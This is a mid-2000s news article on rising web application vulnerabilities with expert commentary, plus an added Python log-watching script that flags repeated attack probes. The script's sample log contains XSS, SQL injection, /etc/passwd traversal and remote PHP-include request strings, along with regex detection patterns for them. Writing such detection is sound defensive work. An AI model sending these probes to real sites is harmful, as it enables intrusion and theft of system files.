
Web apps remain a trouble spot

Cross-site scripting and code injection have become even bigger development issues than buffer overflows. George Hulme reports the new threats to your Web applications.

After more than a decade of organizations focusing on locking down network perimeters, endpoint devices and email, Web applications have surfaced as the new attack flashpoint. Last year was a bad year for Web application security--whether it was overseas hackers reportedly accessing credit card information from thousands of transactions on the state of Rhode Island's Web site, or universities inadvertently spilling sensitive student information, including Social Security numbers, onto the Internet.

Statistics back this up. Symantec said in its most recent Internet Security Threat Report that Web vulnerabilities constituted 69 percent of the 2,249 new vulnerabilities the company documented for the first half of 2006, with 78 percent of "easily exploitable" vulnerabilities residing within Web applications. Mitre Corp.'s September tally of publicly disclosed vulnerabilities mirrors those findings, with cross-site scripting vulnerabilities surpassing buffer overflows as the most reported vulnerability. Four of the top five vulnerabilities were within Web applications, development platforms, or databases often directly exposed to the Internet. Some other common and devastating problems include SQL injection vulnerabilities, directory traversal attacks, and PHP file-include flaws.

Experts warn that Web application attacks are going to escalate before security catches up. Johannes Ullrich, SANS Institute chief research officer, predicts 2007 will be peppered with major Web application-related security incidents where criminals overtake trusted Web sites to steal financial or other sensitive information.

The threats are changing. Chatty spyware and rapidly spreading worms have given way to more clandestine exploits designed to silently pilfer information from Web applications, or change prices on e-commerce sites. Then there's malware that silently infects Web servers and site visitors.

"The attackers have learned that highly aggressive scanning and propagation techniques don't yield more exploited hosts in the end," said Ullrich. "They'd rather infect a popular Web server with browser exploits and then quietly infect visitors to the site."

What are organizations doing about it? Not enough, said Caleb Sima, founder and chief technology officer at Web application vulnerability scanner provider SPI Dynamics. "It's a bigger problem than many enterprises assume," he said. "Despite years of Web applications being targeted, enterprises and other organizations still aren't doing enough to secure their Web sites and apps."

That assertion is backed by WhiteHat Security's Web Application Security Risk Report, which said eight out of 10 Web sites have vulnerabilities that place them at significant risk of attack. The report, which monitors hundreds of sites each month, found that cross-site scripting, information leakage, and predictable resource location are the top three vulnerabilities. "We've found cross-site scripting in seven out of the 10 Web sites we monitor, and predictable resource location in one out of four," said Jeremiah Grossman, WhiteHat's chief technology officer. "Cross-site scripting is all over the place; it's like the plague right now."

There's no easy way to turn around the problem, Ullrich said. For Web applications and servers already deployed, the best defense is thorough scanning with a Web application security scanner. Also, watch logs and deploy intrusion detection sensors. "When it comes to custom applications, many attacks and exploits are not straightforward, and they often need multiple attempts to succeed. This is something IDS will pick up," Ullrich said.
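Ullrich's point that custom-application attacks usually take several attempts, and that log review or an IDS sensor will surface the repetition, can be shown with a small log-watching script. The following is an added example, not code from the article or from any vendor quoted in it. It parses Apache/NCSA-style access log lines (the sample lines below are constructed, using documentation IP ranges), tags requests that carry textbook indicators of the vulnerability classes the article names (cross-site scripting, SQL injection, directory traversal, PHP remote file include), and flags any client whose suspicious requests reach a threshold. The indicator patterns and the threshold of three are assumptions chosen for illustration, not a tuned ruleset.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access log (NCSA common format). Addresses come from the
# TEST-NET documentation ranges; none of this is real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2007:09:12:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 5120
203.0.113.7 - - [10/Feb/2007:09:12:04 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5201
203.0.113.7 - - [10/Feb/2007:09:12:09 +0000] "GET /item?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 312
203.0.113.7 - - [10/Feb/2007:09:12:15 +0000] "GET /download?file=../../etc/passwd HTTP/1.1" 403 221
198.51.100.20 - - [10/Feb/2007:09:13:00 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 189
198.51.100.20 - - [10/Feb/2007:09:13:01 +0000] "GET /index.php?page=http://198.51.100.99/x.txt HTTP/1.1" 404 189
192.0.2.55 - - [10/Feb/2007:09:14:30 +0000] "GET /search?q=red%20shoes HTTP/1.1" 200 4990
192.0.2.55 - - [10/Feb/2007:09:14:31 +0000] "GET /item?id=42 HTTP/1.1" 200 7001
"""

# One NCSA common-format line: client, identd, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Illustrative indicators (assumption: a real deployment would tune these) for the
# vulnerability classes the article names. Applied to the URL-decoded request target.
INDICATORS = [
    ("xss", re.compile(r"<script|javascript:|onerror\s*=", re.I)),
    ("sqli", re.compile(r"('|\")\s*(or|and)\s*('|\")?\d|union\s+select|--\s*$", re.I)),
    ("traversal", re.compile(r"(\.\./|\.\.\\){2,}|/etc/passwd")),
    ("remote_include", re.compile(r"[?&](page|file|include|path)=https?://", re.I)),
]


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(path):
    """Return the set of indicator labels that match the decoded request target."""
    decoded = unquote(path)
    return {label for label, rx in INDICATORS if rx.search(decoded)}


def analyze(log_text, threshold=3):
    """Tally suspicious requests per client and flag clients at or above threshold.

    Returns (per_ip, flagged): per_ip maps client -> list of (timestamp, labels,
    status) for every suspicious request; flagged is the subset of per_ip whose
    count reached the threshold, i.e. the repeated probing an IDS would pick up.
    """
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # skip malformed lines rather than fail the whole run
        labels = classify(entry["path"])
        if labels:
            per_ip[entry["ip"]].append((entry["ts"], sorted(labels), entry["status"]))
    flagged = {ip: hits for ip, hits in per_ip.items() if len(hits) >= threshold}
    return per_ip, flagged


if __name__ == "__main__":
    suspicious, flagged = analyze(SAMPLE_LOG)
    for ip, hits in flagged.items():
        print(f"ALERT {ip}: {len(hits)} suspicious requests")
        for ts, labels, status in hits:
            print(f"  {ts}  {','.join(labels)}  status={status}")
    for ip, hits in suspicious.items():
        if ip not in flagged:
            print(f"watch {ip}: {len(hits)} suspicious request(s), below threshold")
```

On the constructed sample, the first client trips three different indicators within a few seconds and is flagged, the second client shows two probes and is reported as below threshold, and the third client is ordinary traffic. Counting per client across indicator types, rather than matching single requests, is what turns a noisy pattern list into the "multiple attempts" signal Ullrich describes; the status codes are kept so an analyst can see which probes were rejected (403/404) and which reached application code (200/500).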

In fact, most experts advise periodic scanning with multiple tools designed to identify vulnerabilities at the network layer, within the application, and in its configuration. "Even then, you don't always get everything. Some errors involving [business logic] require human analysis," said WhiteHat's Grossman.

Amol Sarwate, vulnerability lab manager at Qualys, said continuous awareness training may be one of the best defenses. "The development and attacker techniques are always evolving, changing. That's why new and even experienced developers need to stay informed, and get educated about secure development," he said. Sarwate points to the Open Web Application Security Project (OWASP) as a good starting point for learning about Web application security.

John Pescatore, security analyst at Gartner, is surprised about some facets of the spate of Web application vulnerabilities. "We had many of these problems in the early days of the Internet," he said. "It's amazing how we are repeating the same old mistakes, and the bad guys will inevitably play around with, and take advantage of, them."
